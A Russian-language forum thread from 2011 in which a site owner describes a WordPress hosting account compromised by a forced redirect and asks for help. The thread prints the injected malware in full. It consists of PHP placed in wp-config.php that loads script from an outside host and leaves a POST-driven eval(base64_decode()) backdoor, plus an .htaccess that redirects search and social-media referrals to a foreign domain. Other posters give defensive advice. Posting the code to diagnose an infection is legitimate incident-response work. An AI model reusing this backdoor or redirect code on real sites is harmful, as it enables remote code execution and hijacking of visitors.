Принудительный redirect

Ну, поздравляю, вирус у Вас :) Причем с хорошими правами доступа видимо.

+1

Утек пароль к ftp

Скрипты на этом хост аккаунте стоят какие-то?

Возможно в одном из скриптов дыра, создающая бекдор для управления файловой системой. Так как ваш htaccess пересоздаётся быстро, скорее через бекдор залит автоматизированый скрипт для создания этого самого несанкционированого редиректа.

Первым делом рекомендую поставить наинисшие права на корректный или пустой .htaccess (не 000 только!), и поменять пароль на FTP на всякий случай. Но это даже не самое малое, сразу же надо приступить именно к поиску дырки в скриптах!

Вторым делом, писать абузу на сайт, которому сливается трафик. Желательно сохранить логи с сервера и приложить существенные из них, с требованием отрубить аккаунт напрочь или как минимум провести разберательство иначе в следующий раз телега пойдёт в более высшие инстанции. Тут зависит от законов положения сервера, но абузить можно ведь не только хостинг компанию, хоть и следует начать с неё, а провайдера и домен регистратора\реселлера.

> Предполагаю что это google шаманит..

😂

спасибо Всем откликнувшимся!... Разобрался.. Проблема была в cms WordPress:

1) какой-то скрипт прописывал следующий код в wp-config.php (в первой строке после стандартной <?p...?>:

<?php	global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

2) в корне создавались файлы indexs.php и wp-config.php.htm - насколько я понял это вообще "левые" файлы которых быть не должно..

3) эта зараза постоянно создавала свой .htaccess в котором присутствовал код :

<IfModule mod_rewrite.c>

RewriteEngine On

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing)\.(.*)

RewriteRule ^(.*)$ http://brendarco.ru/original/index.php [R=301,L]

RewriteCond %{HTTP_REFERER} ^.*(dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|metabot|dmoz|euroseek|about|icq)\.(.*)

RewriteRule ^(.*)$ http://brendarco.ru/original/index.php [R=301,L]										

т.е. редирект был на всякие там http://brendarco.ru и т.д.. Убивать все эти .htaccess не удавалось. Они создавались вновь!!

После долгих усилий мое решение было следующее - пришлось сносить ВСЕ проекты на хостинге под моим акком. Залил оригинальные инсталяшки и установил все проекты заново!

Во общем пришлось повозиться..Просмотрел логи но так и не смог понять в чем был причина (может кто-то пояснит?). Чтобы подобного не случилось вновь я разрешил доступ по фтп только со своего IP. Но как защититься от взлома через html ? И еще вопрос - как тот же .htaccess или другие файлы могут быть модифицированны при установленных правах 644 ?? - запрет на запись..

uty73 добавил 16.12.2011 в 22:43

не затруднит Вас ответить на мои вопросы ? спасибо

интересует этот же вопрос, ибо сегодня аналогичным образом был взломан акк

на компе вирусов нет (стоит лицензия каспер с постоянно обновляемыми базами + дополнительно проверил комп)

но вот вылезла та же фигня, что описывается в сообщении N6 (правда пока редирект не идет)

facegrodno, а что услышать-то хотите? Аудит нужен.

то что біло у меня - описал подробнейшим образом.. Если что уточнить - спрашивайте, помогу чем смогу

спасибо саппарту хостеров, которые помогли вычистить весь код от заразы.

вопрос: как обезопасить себя от повторения подобного?

уязвимость найти не знаю как (много сайтов).

погуглил и узнал, что подобный вирусняк не имеет привязки к CMS и распространяется даже на самописных.

нашел автора данного скрипта, который распространяет его бесплатно через форум, т.е. ломать может каждый, кто знает как пользоваться.

почитайте меня выше..- Поставьте защиту по IP адресу